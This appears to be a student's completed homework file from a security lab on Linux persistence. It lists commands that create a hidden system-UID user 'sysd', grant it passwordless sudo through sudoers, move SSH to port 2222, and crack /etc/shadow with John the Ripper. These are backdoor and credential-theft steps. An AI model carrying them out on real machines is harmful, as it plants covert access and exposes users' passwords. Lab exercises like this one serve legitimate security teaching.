Please edit this file by adding the solution commands on the line below the prompt.
Save and submit the completed file for your homework submission.
Step 1: Shadow People
Create a secret user named
. Make sure this user doesn't have a home folder created:adduser --no-create-home
Give your secret user a password:
passwd sysd
Give your secret user a system UID < 1000:
usermod -u 36 sysd
Give your secret user the same GID:
groupmod -g 36 sysd
- The group "sysd" was already created when I created the user. This command simply modifies the group ID for that group.
Give your secret user full
access without the need for a password:visudo
Added the following line to the end of the 'sudoers' file:sysd ALL=(ALL) NOPASSWD:ALL
Test that
access works without your password:su sysd <as 'sysd'> sudo -l <as 'sysd'> sudo visudo
Step 2: Smooth Sailing
Edit the
file:vi /etc/ssh/sshd_config <----- Editing 'sshd_config' -----> <Added the following line under '#Port 22':> Port 2222 <----- Saved edits to 'sshd_config' ----->
Step 3: Testing Your Configuration Update
Restart the SSH service:
sudo systemctl restart ssh.service
Exit the
SSH to the target machine using your
account and port2222
:ssh [email protected] -p 2222
to switch to the root user:sudo -s
Step 4: Crack All the Passwords
SSH back to the system using your
account and port2222
:ssh [email protected] -p 2222
Escalate your privileges to the
user. Use John to crack the entire/etc/shadow
file:john -wordlist /usr/share/john/password.lst /etc/shadow
I escalated to the root account using "sudo -s".
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